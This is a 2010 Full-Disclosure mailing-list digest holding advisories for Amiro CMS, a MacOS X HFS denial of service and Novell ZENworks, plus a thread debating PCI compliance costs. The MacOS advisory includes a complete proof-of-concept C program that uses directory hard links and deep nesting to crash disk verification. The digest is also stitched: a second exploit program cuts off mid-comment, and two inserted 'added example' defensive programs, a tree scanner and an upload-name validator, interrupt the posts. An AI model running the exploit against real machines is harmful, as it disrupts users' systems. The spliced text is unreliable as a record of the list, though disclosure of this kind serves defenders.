[Full-disclosure] Amiro CMS=5.4.4 PHP injection

2010-04-23 Thread Владимир Воронцов
[ONSEC-09-026] Amiro CMS PHP inj 
[CVE number requested]
Objective: Amiro CMS = 5.4.4 
Type: PHP injection 
Threat: Medium 
Discovery date: 29.12.2009 
Date of notification Developer: 29.12.2009 
Released correction: 03/05/2010 
Author: Vladimir Vorontsov 
OnSec Russian Security Group (onsec [dot] ru) 
Description: A vulnerability opens the way to overwrite and create
arbitrary files on the target system. 
An attacker can affect the data written to the file by changing some
parameters in the administrative console. 
Also, due to lack of filtering, an attacker can specify an arbitrary file
name and path using relative path notation. 
The most dangerous case is the creation of a file executable by the interpreter,
which leads to the execution of arbitrary commands. 
For exploitation, a user account with access to the Data Sharing module in the
administrative console is required. 
The vulnerability exists due to lack of filtering of the name and file
type in the Data Sharing module.

original in Russian: http://onsec.ru/vuln?id=21

-- 
Best regards, 
Vladimir Vorontsov
ONsec security expert

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] CVE or SUN bug number for http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html

2010-04-23 Thread Juha-Matti Laurio
Check CVE-2010-1423
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1423

Juha-Matti

Lode, Nilss [nilss.l...@siemens.com] wrote: 
 Hello,
 
 I was trying to track the security problem outlined in the following article:
 
 http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html
 
 
 Is a CVE and / or SUN bug number available ?
 
 I need this to determine when a solution is available.
 
 
 With best regards,
 Nilss Lode
 
 Siemens AG
 Corporate Technology
 CT T DE IT 1
 Otto-Hahn-Ring 6
 80200 Munich, Germany
 Tel.: +49 (89) 636-41267
 Fax: +49 (89) 636-41166
 Mobile: +49 (173) 7068828
 mailto:nilss.l...@siemens.com
 
 
 http://www.siemens.com/cert
 
 



[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability

2010-04-23 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.04.2010
- - Pub.: 23.04.2010

CVE: CVE-2010-0105
Risk: Medium

Affected Software:
- - MacOS 10.6 (tested on 1062 and 1063)

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/83


- --- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer,  Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
Mac OS was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.


- --- 1. MacOS X 10.6.3 filesystem hfs Denial of Service ---
The main problem exists in the implementation of the filesystem (hfs). MacOS X
10.6.3 uses hfs as its default filesystem, so the problem arises when we create
a special structure with hardlinks.

Interesting information is on Wikipedia:

http://en.wikipedia.org/wiki/Hard_link

- ---
...
Most modern operating systems don't allow hard links on directories to
prevent endless recursion. A notable exception to this is Mac OS X v10.5
(Leopard) which uses hard links on directories for the Time Machine
backup mechanism only.
...
- ---

In 10.6 we can't use the ln(1) command to create a hardlink to a directory
(example: # ln C/C CX ). Anyway, we can use the link(3) function and we
don't need any special privileges! It sounds nice to exploit.. let's try

To show this issue, we need to use this program:
( http://securityreason.com/achievement_exploitalert/15 )

- --- hfs_poc.c ---
/*  Proof of Concept for CVE-2010-0105
MacOS X 10.6 hfs file system attack (Denial of Service)
by Maksymilian Arciemowicz from SecurityReason.com

http://securityreason.com/achievement_exploitalert/15

NOTE:

This DoS will be triggered in the phase

Checking multi-linked directories

so we need to activate it with the line

connlink("C/C","CX");

Then we need to create a PATH_MAX/2 directory tree to make the overflow,

and we should get diskutil and fsck_hfs exiting with sig=8

~ x$ diskutil verifyVolume /Volumes/max2
Started filesystem verification on disk0s3 max2
Performing live verification
Checking Journaled HFS Plus volume
Checking extents overflow file
Checking catalog file
Checking multi-linked files
Checking catalog hierarchy
Checking extended attributes file
Checking multi-linked directories
Maximum nesting of folders and directory hard links reached
The volume max2 could not be verified completely
Error: -9957: Filesystem verify or repair failed
Underlying error: 8: POSIX reports: Exec format error


*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>

/* mkdir(2) wrapper: exits on failure so the tree depth stays exact */
int createdir(char *name){
    if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0)) | S_IWUSR | S_IXUSR)){
        printf("Can't create %s\n", name);
        exit(1);
    }
    return 0;
}

/* chdir(2) wrapper */
int comein(char *name){
    if(0!=chdir(name)){
        printf("Can't chdir in to %s\n", name);
        exit(1);
    }
    return 0;
}

/* link(2) wrapper: on 10.6 link() accepts a directory, which ln(1) refuses */
int connlink(char *a, char *b){
    if(0!=link(a,b)){
        printf("Can't create link %s => %s\n",a,b);
        exit(1);
    }
    return 0;
}

int main(int argc,char *argv[]){
    int level;

    if(argc==2) {
        level=atoi(argv[1]);
    }else{
        level=512; //default
    }
    createdir("C");   //create directory
    createdir("C/C"); //create nested directory

    connlink("C/C","CX"); //directory hardlink: needed so fsck reaches "Checking multi-linked directories"

    comein("C");

    while(level--){
        /* create before entering; as separate statements, since the order in
           which function arguments are evaluated is unspecified in C */
        int m=createdir("C");
        int c=comein("C");
        printf("Level: %i mkdir:%i chdir:%i\n",level,m,c);
    }

    printf("check diskutil verifyVolume /\n");
    return 0;
}

- --- hfs_poc.c ---

or use

- --- last.c ---
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>

/* function mkpath() from mkdir(1)/netbsd
 * Copyright for mkdir.c (c) 1983, 1992, 1993
 *  The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in 
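As an added example (not part of the advisory or its proof of concept), the C program below is the defender's-side check for the condition the advisory describes: it walks a tree without ever descending past a chosen depth cap, and refuses to re-enter a directory whose (st_dev, st_ino) pair is already on the current path, which is how a directory hard link loop presents to lstat(2). The cap of PATH_MAX/2 mirrors the advisory; the demo builds and removes a constructed 12-level chain under /tmp, and all function names are hypothetical.

```c
/* Added example, not part of the advisory or its PoC: a bounded directory walker
 * that never descends past `cap` levels and never re-enters a directory whose
 * (st_dev, st_ino) pair is already on the current path, which is how a directory
 * hard link loop presents to lstat(2). Names are hypothetical; the demo tree is
 * constructed sample input. */
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

struct scan_result {
    int max_depth;    /* deepest level reached, root = 0 (-1 on error) */
    int depth_capped; /* directories not entered because the cap was hit */
    int loops;        /* child directories whose inode was already on the path */
};
struct path_id { dev_t dev; ino_t ino; };

static int on_path(const struct path_id *ids, int n, dev_t dev, ino_t ino)
{
    for (int i = 0; i < n; i++)
        if (ids[i].dev == dev && ids[i].ino == ino) return 1;
    return 0;
}

static void walk(const char *dir, int depth, struct path_id *ids, int cap, struct scan_result *r)
{
    if (depth > r->max_depth) r->max_depth = depth;
    if (depth >= cap) { r->depth_capped++; return; }  /* stop where fsck_hfs would give up */
    DIR *d = opendir(dir);
    if (d == NULL) return;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char child[PATH_MAX];
        struct stat st;
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        if (snprintf(child, sizeof child, "%s/%s", dir, e->d_name) >= (int)sizeof child) continue;
        /* lstat: symlinks stay links; only real or hard-linked directories recurse */
        if (lstat(child, &st) != 0 || !S_ISDIR(st.st_mode)) continue;
        if (on_path(ids, depth + 1, st.st_dev, st.st_ino)) { r->loops++; continue; }
        ids[depth + 1].dev = st.st_dev;
        ids[depth + 1].ino = st.st_ino;
        walk(child, depth + 1, ids, cap, r);
    }
    closedir(d);
}

/* Scan `root`, descending at most `cap` levels (PATH_MAX / 2 mirrors the advisory). */
int scan_tree(const char *root, int cap, struct scan_result *r)
{
    struct stat st;
    r->max_depth = -1; r->depth_capped = 0; r->loops = 0;
    if (cap < 1 || lstat(root, &st) != 0 || !S_ISDIR(st.st_mode)) return -1;
    struct path_id *ids = calloc((size_t)cap + 1, sizeof *ids);
    if (ids == NULL) return -1;
    ids[0].dev = st.st_dev; ids[0].ino = st.st_ino;
    r->max_depth = 0;
    walk(root, 0, ids, cap, r);
    free(ids);
    return 0;
}
/* Constructed sample tree base/C/C/... `levels` deep; returns how many were made. */
static int build_chain(char *path, size_t pathlen, int levels)
{
    int made = 0;
    while (made < levels && strlen(path) + 3 < pathlen) {
        strcat(path, "/C");
        if (mkdir(path, 0700) != 0) break;
        made++;
    }
    return made;
}
/* Remove the `made` chain directories and then the temp root, deepest first. */
static void remove_chain(char *path, int made)
{
    for (int i = 0; i <= made; i++) {
        rmdir(path);
        char *slash = strrchr(path, '/');
        if (slash == NULL) break;
        *slash = '\0';
    }
}
/* Build a chain under /tmp, scan it with the given cap, clean up, return the result. */
struct scan_result demo(int levels, int cap)
{
    struct scan_result r = { -1, 0, 0 };
    char path[PATH_MAX] = "/tmp/hfsscan.XXXXXX", root[PATH_MAX];
    if (mkdtemp(path) == NULL) return r;
    strcpy(root, path);
    int made = build_chain(path, sizeof path, levels);
    if (made == levels) scan_tree(root, cap, &r);
    remove_chain(path, made);
    return r;
}
int main(void)
{
    struct scan_result r = demo(12, PATH_MAX / 2);
    printf("deepest level %d, capped %d, loops %d\n", r.max_depth, r.depth_capped, r.loops);
    return 0;
}
```

On a real volume one would call scan_tree() on the mount point with cap = PATH_MAX / 2; a non-zero depth_capped or loops count is the signal that fsck_hfs may not complete, and that the offending subtree should be inspected before the checker is run. lstat() rather than stat() keeps symlinks out of the picture, so anything counted as a loop is a genuine second path to the same directory inode.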

Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christopher Gilbert
The paper concludes that companies are underinvesting in--or improperly
prioritizing--the protection of their secrets. Nowhere does it state that
the money spent on compliance is money wasted.

On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote:

 I find the findings completely flawed.  Am I missing something?


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Mike Hale
Their conclusions are based, IMO, on a flawed methodology.

With some conservative assumptions, the paper indicates that companies
actually spend 50% of their budget protecting secrets versus 20% on
complying with external regulations.

I wrote up a more thorough response which I'll post in a few days when
I've proof-read it some more.

On Thu, Apr 22, 2010 at 4:48 PM, Christopher Gilbert mot...@gmail.com wrote:
 The paper concludes that companies are underinvesting in--or improperly
 prioritizing--the protection of their secrets. Nowhere does it state that
 the money spent on compliance is money wasted.

 On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com
 wrote:

 I find the findings completely flawed.  Am I missing something?





-- 
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0



Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
Another thing that I think people fail to keep in mind is that when it comes to 
PCI, it is part of a contractual agreement between the entity and card facility 
they are working with.   If a business wants to accept credit cards as a means 
of payment (based on volume) then part of their agreement is that they must 
undergo compliance to a standard implemented by the industry.  I don't know why 
people get all emotional about it and throw up their hands with all the “this 
is wasted money” positioning - it's not wasted at all; it is simply part of the 
cost of doing business in that market.

t

From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher 
Gilbert
Sent: Thursday, April 22, 2010 4:48 PM
To: Mike Hale
Cc: full-disclosure; security-bas...@securityfocus.com
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

The paper concludes that companies are underinvesting in--or improperly 
prioritizing--the protection of their secrets. Nowhere does it state that the 
money spent on compliance is money wasted.
On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote:
I find the findings completely flawed.  Am I missing something?


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
it is simply part of the cost of doing business in that market.
A.k.a. wasted money. Truth be told, I'm no fan of PCI.
Other companies get the same functionality (accept the storage of credit
cards) without worrying about PCI/DSS (e.g. through Payment Gateways).
In the end, as a service, what do I want, an inventory of credit cards, or a
stable payment system? The latter I guess.
As to security, it totally depends on implementation; one can handle credit
cards without the need of standards compliance.

My two cents.

Regards,
Christian Sciberras.



On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:

 Another thing that I think people fail to keep in mind is that when it
 comes to PCI, it is part of a contractual agreement between the entity and
 card facility they are working with.   If a business wants to accept credit
 cards as a means of payment (based on volume) then part of their agreement
 is that they must undergo compliance to a standard implemented by the
 industry.  I don’t know why people get all emotional about it and throw up
 their hands with all the “this is wasted money” positioning – it’s not
 wasted at all; it is simply part of the cost of doing business in that
 market.



 t



 *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
 full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christopher
 Gilbert
 *Sent:* Thursday, April 22, 2010 4:48 PM
 *To:* Mike Hale
 *Cc:* full-disclosure; security-bas...@securityfocus.com
 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 The paper concludes that companies are underinvesting in--or improperly
 prioritizing--the protection of their secrets. Nowhere does it state that
 the money spent on compliance is money wasted.

 On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com
 wrote:

 I find the findings completely flawed.  Am I missing something?





[Full-disclosure] ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability

2010-04-23 Thread ZDI Disclosures
ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code 
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-078
April 23, 2010

-- Affected Vendors:
Novell

-- Affected Products:
Novell Zenworks

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9715. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Novell ZENworks. Authentication is not
required to exploit this vulnerability.

The specific flaw exists within the ZENworks Server (zenserver.exe).
This Tomcat server listens by default on TCP ports 80 and 443. The
vulnerability exists in the UploadServlet. Using the UploadServlet an
attacker can upload a malicious file outside of the TEMP directory on
the server. By accessing this uploaded file remotely it is executed in
the context of the zenserver.exe process. This can be exploited to gain
arbitrary code execution in the context of the user running the ZENworks
server.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:

http://www.novell.com/support/viewContent.do?externalId=7005573

-- Disclosure Timeline:
2010-02-09 - Vulnerability reported to vendor
2010-04-23 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi
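Both the Amiro CMS Data Sharing advisory earlier in this digest and the ZENworks UploadServlet advisory above describe the same class of defect: a file name and type taken from the client without filtering, so the uploaded file can land outside the intended directory or carry an extension the server will execute. The C program below is an added example written for this digest, not code from either product; it shows the validation an upload handler should perform before it composes a path. The storage directory /srv/app/uploads, the extension allowlist and every function name are assumptions.

```c
/* Added example, not code from Amiro CMS or Novell ZENworks: the validation an
 * upload handler should apply to a client-supplied file name before writing
 * under its storage directory. The defect both advisories describe is a name or
 * type accepted without filtering, so the file lands outside the directory or
 * with an executable extension. All names here are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp */

enum upload_verdict {
    UPLOAD_OK = 0,
    UPLOAD_EMPTY,        /* no name supplied */
    UPLOAD_PATH_CHARS,   /* contains '/' or '\\': could escape the directory */
    UPLOAD_DOTFILE,      /* starts with '.': covers "..", ".htaccess", hidden files */
    UPLOAD_BAD_NAME,     /* not exactly one extension, e.g. "x.php.txt" or "noext" */
    UPLOAD_BAD_CHARS,    /* characters outside [A-Za-z0-9_-] in the base name */
    UPLOAD_EXT_DENIED,   /* extension not on the allowlist */
    UPLOAD_TOO_LONG      /* name or composed path exceeds the limit */
};

/* Allowlist of extensions the application actually needs. Anything the web
 * server or container might execute (.php, .jsp, .cgi, ...) is simply absent. */
static const char *const ALLOWED_EXT[] = { "txt", "csv", "png", "jpg", "pdf", NULL };
#define MAX_NAME_LEN 100

static int ext_allowed(const char *ext)
{
    for (int i = 0; ALLOWED_EXT[i] != NULL; i++)
        if (strcasecmp(ext, ALLOWED_EXT[i]) == 0) return 1;
    return 0;
}

/* Validate `name` and, when it passes, write "<base>/<name>" into out. */
enum upload_verdict safe_upload_path(const char *base, const char *name,
                                     char *out, size_t outlen)
{
    size_t len = strlen(name);
    if (len == 0) return UPLOAD_EMPTY;
    if (len > MAX_NAME_LEN) return UPLOAD_TOO_LONG;
    if (strpbrk(name, "/\\") != NULL) return UPLOAD_PATH_CHARS;
    if (name[0] == '.') return UPLOAD_DOTFILE;

    /* Exactly one '.', so the allowlist is applied to the only extension and
     * double-extension tricks such as "shell.php.txt" are rejected outright. */
    const char *dot = strchr(name, '.');
    if (dot == NULL || strchr(dot + 1, '.') != NULL || dot[1] == '\0')
        return UPLOAD_BAD_NAME;
    for (const char *p = name; p < dot; p++)
        if (!isalnum((unsigned char)*p) && *p != '_' && *p != '-')
            return UPLOAD_BAD_CHARS;
    for (const char *p = dot + 1; *p != '\0'; p++)
        if (!isalnum((unsigned char)*p)) return UPLOAD_BAD_CHARS;
    if (!ext_allowed(dot + 1)) return UPLOAD_EXT_DENIED;

    /* The name is a single safe path component, so base + "/" + name cannot
     * resolve anywhere outside base. A silently truncated path is refused. */
    int n = snprintf(out, outlen, "%s/%s", base, name);
    if (n < 0 || (size_t)n >= outlen) return UPLOAD_TOO_LONG;
    return UPLOAD_OK;
}

/* Wrappers so the verdict and the composed path can be inspected directly. */
enum upload_verdict check_name(const char *name)
{
    char buf[256];
    return safe_upload_path("/srv/app/uploads", name, buf, sizeof buf);
}

const char *demo_path(const char *name)
{
    static char buf[256];
    if (safe_upload_path("/srv/app/uploads", name, buf, sizeof buf) != UPLOAD_OK)
        return NULL;
    return buf;
}

int main(void)
{
    /* Constructed sample names, including the shapes both advisories describe. */
    const char *samples[] = { "report.txt", "../../etc/crontab", "..\\..\\win.ini",
                              "shell.php", "shell.php.txt", ".htaccess", "a b.txt" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> verdict %d\n", samples[i], (int)check_name(samples[i]));
    return 0;
}
```

The design choice is to allowlist rather than strip: a name that fails any rule is rejected with a reason the caller can log, instead of being "cleaned" into something that might still be interpreted differently by the web server (multiple extensions, trailing dots or spaces on Windows, alternate data streams). The one-dot rule is deliberately strict; an application that needs dotted base names would instead check every dotted suffix against the allowlist.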


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
How can you say it is “wasted”? It doesn't matter if you are a “fan” of it or 
not, in the same way that it doesn't matter if you are a “fan” of the 4% 
surcharge retail establishments pay to accept the credit card as payment.  
Using your logic, you would say it is “wasted money,” and might bring into 
question the “value” of the surcharge, etc.  It is simply a cost of doing 
business.

If you choose to offload processing to a payment gateway, then that will also 
incur a cost.  Depending on your volume, that cost may or may not be higher 
than you processing them yourself while complying to standards.  The 
implementation of actual security measures will be different.  But you can't 
“handle” credit cards in the classic sense of the word without complying with 
PCI.  If you pass along the transaction to a gateway, you are not handling it.  
If you DO handle it, then you have to comply with PCI.  If you process less 
than 1 million transactions a year, you can “self audit.”  If you process more, 
you have to be audited by a PCI auditor.

None of this MEANS you are secure, it means you comply.  If you don't like PCI, 
then don't process credit cards, or come up with your own.  I still don't 
really see what all the hubbub is about here.

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Friday, April 23, 2010 9:29 AM
To: Thor (Hammer of God)
Cc: Christopher Gilbert; Mike Hale; full-disclosure; 
security-bas...@securityfocus.com
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

it is simply part of the cost of doing business in that market.
A.k.a. wasted money. Truth be told, I'm no fan of PCI.
Other companies get the same functionality (accept the storage of credit cards) 
without worrying about PCI/DSS (e.g. through Payment Gateways).
In the end, as a service, what do I want, an inventory of credit cards, or a 
stable payment system? The latter I guess.
As to security, it totally depends on implementation; one can handle credit 
cards without the need of standards compliance.

My two cents.

Regards,
Christian Sciberras.


On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) 
t...@hammerofgod.com wrote:
Another thing that I think people fail to keep in mind is that when it comes to 
PCI, it is part of a contractual agreement between the entity and card facility 
they are working with.   If a business wants to accept credit cards as a means 
of payment (based on volume) then part of their agreement is that they must 
undergo compliance to a standard implemented by the industry.  I don't know why 
people get all emotional about it and throw up their hands with all the this 
is wasted money positioning - it's not wasted at all; it is simply part of the 
cost of doing business in that market.

t

From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher Gilbert
Sent: Thursday, April 22, 2010 4:48 PM
To: Mike Hale
Cc: full-disclosure; security-bas...@securityfocus.com
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

The paper concludes that companies are underinvesting in--or improperly 
prioritizing--the protection of their secrets. Nowhere does it state that the 
money spent on compliance is money wasted.
On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote:
I find the findings completely flawed.  Am I missing something?




Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Stephen Mullins
I don't see what the hubbub is

Some people in the information security industry actually care about
securing systems and the information they contain rather than filling
in check boxes.  Compliance may ensure a minimum standard is met, but
it does not ensure or imply that real security is being maintained at
an organization.

As you say, PCI has become a cost of doing business whereas having a
secure network is apparently not a cost of doing business.  This is a
problem.

Crazy notion, I know.

On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it
 or not, in the same way that it doesn’t matter if you are a “fan” of the 4%
 surcharge retail establishments pay to accept the credit card as payment.
 Using your logic, you would say it is “wasted money,” and might bring into
 question the “value” of the surcharge, etc.  It is simply a cost of doing
 business.



 If you choose to offload processing to a payment gateway, then that will
 also incur a cost.  Depending on your volume, that cost may or may not be
 higher than you processing them yourself while complying to standards.  The
 implementation of actual security measures will be different.  But you can’t
 “handle” credit cards in the classic sense of the word without complying
 with PCI.  If you pass along the transaction to a gateway, you are not
 handling it.  If you DO handle it, then you have to comply with PCI.  If you
 process less than 1 million transactions a year, you can “self audit.”  If
 you process more, you have to be audited by a PCI auditor.



 None of this MEANS you are secure, it means you comply.  If you don’t like
 PCI, then don’t process credit cards, or come up with your own.  I still
 don’t really see what all the hubbub is about here.



 t



 From: Christian Sciberras [mailto:uuf6...@gmail.com]
 Sent: Friday, April 23, 2010 9:29 AM
 To: Thor (Hammer of God)
 Cc: Christopher Gilbert; Mike Hale; full-disclosure;
 security-bas...@securityfocus.com
 Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 it is simply part of the cost of doing business in that market.
 A.k.a. wasted money. Truth be told, I'm no fan of PCI.
 Other companies get the same functionality (accept the storage of credit
 cards) without worrying about PCI/DSS (e.g. through Payment Gateways).
 In the end, as a service, what do I want, an inventory of credit cards, or a
 stable payment system? The latter I guess.
 As to security, it totally depends on implementation; one can handle credit
 cards without the need of standards compliance.

 My two cents.

 Regards,
 Christian Sciberras.


 On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

 Another thing that I think people fail to keep in mind is that when it comes
 to PCI, it is part of a contractual agreement between the entity and card
 facility they are working with.   If a business wants to accept credit cards
 as a means of payment (based on volume) then part of their agreement is that
 they must undergo compliance to a standard implemented by the industry.  I
 don’t know why people get all emotional about it and throw up their hands
 with all the “this is wasted money” positioning – it’s not wasted at all; it
 is simply part of the cost of doing business in that market.



 t



 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher
 Gilbert
 Sent: Thursday, April 22, 2010 4:48 PM
 To: Mike Hale
 Cc: full-disclosure; security-bas...@securityfocus.com
 Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 The paper concludes that companies are underinvesting in--or improperly
 prioritizing--the protection of their secrets. Nowhere does it state that
 the money spent on compliance is money wasted.

 On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com
 wrote:

 I find the findings completely flawed.  Am I missing something?










Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Michael Holstein

 Some people in the information security industry actually care about
 securing systems and the information they contain rather than filling
 in check boxes.  

So what's the problem? .. if you have done it according to (or
exceeding) the spec .. check the box, buy a box of donuts for the
auditor .. let them look it over, and be done with it.


 Compliance may ensure a minimum standard is met, but
 it does not ensure or imply that real security is being maintained at
 an organization.

   

If VISA (et al.) could define “real security” and write it down, they
would. What is “real security” exactly? .. I'd argue the only secure
computer is one that's still sealed in the factory carton. Break the
seal, game over .. just like it says on a box of Band-Aids: “Sterility
guaranteed until opened.”

 As you say, PCI has become a cost of doing business whereas having a
 secure network is apparently not a cost of doing business.  This is a
 problem.
   

The thinking goes .. that if you implement the PCI standards and aim to
actually do as it suggests (meaning doing what the documents suggests
*correctly* .. not just having a blinkinlight in place so you can check
a box) .. you're already down the right path.

Even so .. the problem with securing networks/systems is there's
millions of them and only a few of you. Also .. you have to be right
100% of the time, and they only have to get lucky once.

My $10.02 ($10 minimum purchase on all credit cards). **

Cheers,

Michael Holstein
Cleveland State University

** : yes, I know this goes against the merchant agreement .. sarcasm.



Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
Three things:  

1) I am one of those people, as many of us are.
2) I disagree - compliance with the standard, as put forth by the body 
developing the standard, certainly implies a real security benefit.  Does 
PCI=Security?  No, but it certainly helps.  There is a huge difference between 
“ensure” and “imply”.  Using them together like that as if they are synonymous 
is a red herring.   Think about what you just said: “it doesn't imply real 
security.”  THAT doesn't define ANYTHING actionable.  Nothing.   What the 
standard does IS to define at least measures to be taken that can increase 
security - it has specifics and action items.  It is tangible.  And, it is far 
more likely to provide a real benefit than not.  It *certainly* does more than 
having some policy say “You must imply real security.”  If you are one of those 
people that care about security,  and if your takeaway from PCI is that it 
doesn't imply real security but you fail to tell us what does, then I would 
have to say you are not really providing any benefit.  
3) Apparently not a cost of doing business how?  What did I say that makes 
that statement apparent?   I fail to see how you can connect what the OP stated 
as “Compliance is Wasted Money” with “apparently having a secure network is not 
a cost of doing business.”   They are two different things.   If you want to 
process credit cards in your business to make more money, and the credit card 
industry says, up front, “ok, you can play if you follow these rules,” then 
that is a cost of doing business.  If you actually do enough business to 
justify PCI audits, and you as a security person implement a system that passes 
all PCI audit requirements as written, but still FAIL to have a system where no 
security is implied, then YOU have not done your job.  No amount of blaming 
PCI's inadequacies is going to make up for people not taking responsibility for 
doing their jobs.  Period.

t

-Original Message-
From: Stephen Mullins [mailto:steve.mullins.w...@gmail.com] 
Sent: Friday, April 23, 2010 10:40 AM
To: Thor (Hammer of God)
Cc: Christian Sciberras; security-bas...@securityfocus.com; full-disclosure
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

I don't see what the hubbub is

Some people in the information security industry actually care about securing 
systems and the information they contain rather than filling in check boxes.  
Compliance may ensure a minimum standard is met, but it does not ensure or 
imply that real security is being maintained at an organization.

As you say, PCI has become a cost of doing business whereas having a secure 
network is apparently not a cost of doing business.  This is a problem.

Crazy notion, I know.

On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com 
wrote:
 How can you say it is wasted? It doesn't matter if you are a fan 
 of it or not, in the same way that it doesn't matter if you are a 
 fan of the 4% surcharge retail establishments pay to accept the credit card 
 as payment.
 Using your logic, you would say it is “wasted money,” and might bring 
 into question the value of the surcharge, etc.  It is simply a cost 
 of doing business.



 If you choose to offload processing to a payment gateway, then that 
 will also incur a cost.  Depending on your volume, that cost may or 
 may not be higher than you processing them yourself while complying to 
 standards.  The implementation of actual security measures will be 
 different.  But you can't handle credit cards in the classic sense 
 of the word without complying with PCI.  If you pass along the 
